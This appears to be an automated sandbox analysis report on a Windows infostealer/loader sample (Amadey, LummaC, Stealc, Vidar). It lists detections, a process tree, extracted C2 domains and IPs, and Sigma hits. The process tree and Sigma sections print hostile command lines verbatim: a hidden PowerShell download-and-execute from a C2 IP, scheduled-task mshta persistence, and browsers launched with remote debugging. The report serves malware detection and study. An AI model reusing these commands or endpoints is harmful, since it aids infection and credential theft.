Edit tour

Windows Analysis Report
hHtR1O06GH.exe

Overview

General Information

Sample name:	hHtR1O06GH.exe renamed because original name is a hash value
Original sample name:	41bfbce19932e1a75259a03ba23bdd33.exe
Analysis ID:	1617690
MD5:	41bfbce19932e1a75259a03ba23bdd33
SHA1:	af829594dc191d8dc5f0bcdde496d1b98130d754
SHA256:	efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989
Tags:	exeuser-abuse_ch
Infos:

Detection

Amadey, Healer AV Disabler, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell download and execute file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected Healer AV Disabler

Yara detected LummaC Stealer

Yara detected Powershell decode and execute

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

Yara detected obfuscated html page

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Creates HTA files

Creates HTML files with .exe extension (expired dropper behavior)

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Modifies windows update settings

PE file contains section with special chars

Powershell drops PE file

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: PowerShell DownloadFile

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to download and execute files (via powershell)

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

hHtR1O06GH.exe (PID: 5788 cmdline: "C:\Users\user\Desktop\hHtR1O06GH.exe" MD5: 41BFBCE19932E1A75259A03BA23BDD33)

skotes.exe (PID: 3240 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 41BFBCE19932E1A75259A03BA23BDD33)

skotes.exe (PID: 5588 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 41BFBCE19932E1A75259A03BA23BDD33)

Ta3ZyUR.exe (PID: 4600 cmdline: "C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe" MD5: D22717AEAB82B39D20EE5A5C400246F9)

Ta3ZyUR.exe (PID: 6988 cmdline: "C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe" MD5: D22717AEAB82B39D20EE5A5C400246F9)

WerFault.exe (PID: 6928 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 840 MD5: C31336C1EFC2CCB44B4326EA793040F2)

qFqSpAp.exe (PID: 2028 cmdline: "C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe" MD5: 10575437DABDDDAD09B7876FD8A7041C)

m5UP2Yj.exe (PID: 5756 cmdline: "C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe" MD5: 74183FECFF41DA1E7BAF97028FEE7948)

jROrnzx.exe (PID: 2696 cmdline: "C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe" MD5: 73D3580F306B584416925E7880B11328)

conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

jROrnzx.exe (PID: 5644 cmdline: "C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe" MD5: 73D3580F306B584416925E7880B11328)

WerFault.exe (PID: 5240 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 964 MD5: C31336C1EFC2CCB44B4326EA793040F2)

7aencsM.exe (PID: 5376 cmdline: "C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe" MD5: 661D0730B1F141175184A531C770774A)

conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

7aencsM.exe (PID: 5788 cmdline: "C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe" MD5: 661D0730B1F141175184A531C770774A)

7aencsM.exe (PID: 3668 cmdline: "C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe" MD5: 661D0730B1F141175184A531C770774A)

chrome.exe (PID: 7160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 2164 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2724 --field-trial-handle=2276,i,6118393692316943769,361084761922712429,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

Conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 5296 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

WerFault.exe (PID: 2956 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 964 MD5: C31336C1EFC2CCB44B4326EA793040F2)

9db7f37142.exe (PID: 6964 cmdline: "C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe" MD5: F9D8BF1E21147A4F8A1A995D76B22E64)

cmd.exe (PID: 6184 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn RGN8PmarJNM /tr "mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3848 cmdline: schtasks /create /tn RGN8PmarJNM /tr "mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)

mshta.exe (PID: 4744 cmdline: mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 3616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE (PID: 5892 cmdline: "C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE" MD5: 01C87832191E4EC3561802276E00A9DA)

cmd.exe (PID: 600 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1085379021\am_no.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4200 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1085379021\am_no.cmd" any_word MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 5340 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cmd.exe (PID: 6920 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

powershell.exe (PID: 6164 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 2564 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

powershell.exe (PID: 5784 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 6184 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

powershell.exe (PID: 5452 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

7aencsM.exe (PID: 1232 cmdline: "C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe" MD5: 661D0730B1F141175184A531C770774A)

conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

7aencsM.exe (PID: 2196 cmdline: "C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe" MD5: 661D0730B1F141175184A531C770774A)

7aencsM.exe (PID: 4352 cmdline: "C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe" MD5: 661D0730B1F141175184A531C770774A)

WerFault.exe (PID: 3632 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 952 MD5: C31336C1EFC2CCB44B4326EA793040F2)

mshta.exe (PID: 5564 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 2284 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

9db7f37142.exe (PID: 3468 cmdline: "C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe" MD5: F9D8BF1E21147A4F8A1A995D76B22E64)

cmd.exe (PID: 6912 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn iHAoEmaFAXq /tr "mshta C:\Users\user\AppData\Local\Temp\qBrryFCFZ.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6076 cmdline: schtasks /create /tn iHAoEmaFAXq /tr "mshta C:\Users\user\AppData\Local\Temp\qBrryFCFZ.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)

mshta.exe (PID: 6304 cmdline: mshta C:\Users\user\AppData\Local\Temp\qBrryFCFZ.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 6452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.lexfo.fr/StealC_malware_analysis_part1.html https://blog.lexfo.fr/StealC_malware_analysis_part2.html https://blog.lexfo.fr/StealC_malware_analysis_part3.html https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["RadiatntIdeas.top", "nestlecompany.world", "mercharena.biz", "generalmills.pro", "stormlegue.com", "blast-hubs.com", "blastikcn.com", "nestlecompany.pro"], "Build id": "LPnhqo--fkihebqszcey"}

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199828130190", "Botnet": "ot0yikam"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Temp\nRyLXHovP.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\DTQCxXZ[1].exe	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\tYliuwV[1].ps1	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security
C:\Users\user\AppData\Local\Temp\qBrryFCFZ.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Users\user\AppData\Local\Temp\1085387001\DTQCxXZ.exe	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1085385041\tYliuwV.ps1	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author
00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000008.00000002.2117478393.0000000003E19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000F.00000002.2158683213.000000000189E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000004.00000002.2776117739.0000000000451000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000010.00000002.2193761654.0000000003C09000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000F.00000003.2109898501.0000000005470000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000018.00000002.2775673323.0000000000401000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000012.00000002.2323901817.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000E.00000002.2170321304.0000000001AB0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000F.00000002.2150295559.0000000000E21000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000009.00000002.2775687019.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000E.00000003.2122030581.0000000001B5B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1527475579.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000003.2122645101.0000000001B5B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Ta3ZyUR.exe PID: 6988	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Ta3ZyUR.exe PID: 6988	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: qFqSpAp.exe PID: 2028	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: qFqSpAp.exe PID: 2028	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: qFqSpAp.exe PID: 2028	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: m5UP2Yj.exe PID: 5756	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: m5UP2Yj.exe PID: 5756	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 7aencsM.exe PID: 5376	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 7aencsM.exe PID: 3668	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 7aencsM.exe PID: 3668	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: mshta.exe PID: 4744	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3616	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: mshta.exe PID: 5564	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE PID: 5892	JoeSecurity_Healer	Yara detected Healer AV Disabler	Joe Security
Process Memory Space: powershell.exe PID: 848	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: mshta.exe PID: 6304	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 6452	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author
9.2.Ta3ZyUR.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
14.2.qFqSpAp.exe.1bb0000.1.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
18.2.jROrnzx.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
9.2.Ta3ZyUR.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
16.2.jROrnzx.exe.3c09550.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
18.2.jROrnzx.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
8.2.Ta3ZyUR.exe.3e19550.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.2.hHtR1O06GH.exe.ed0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.skotes.exe.450000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
4.2.skotes.exe.450000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 5 entries

Other

Source	Rule	Description	Author	Strings
amsi32_3616.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_6452.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn RGN8PmarJNM /tr "mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn RGN8PmarJNM /tr "mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe, ParentProcessId: 6964, ParentProcessName: 9db7f37142.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn RGN8PmarJNM /tr "mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 6184, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 5588, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9db7f37142.exe

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4744, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, ProcessId: 3616, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

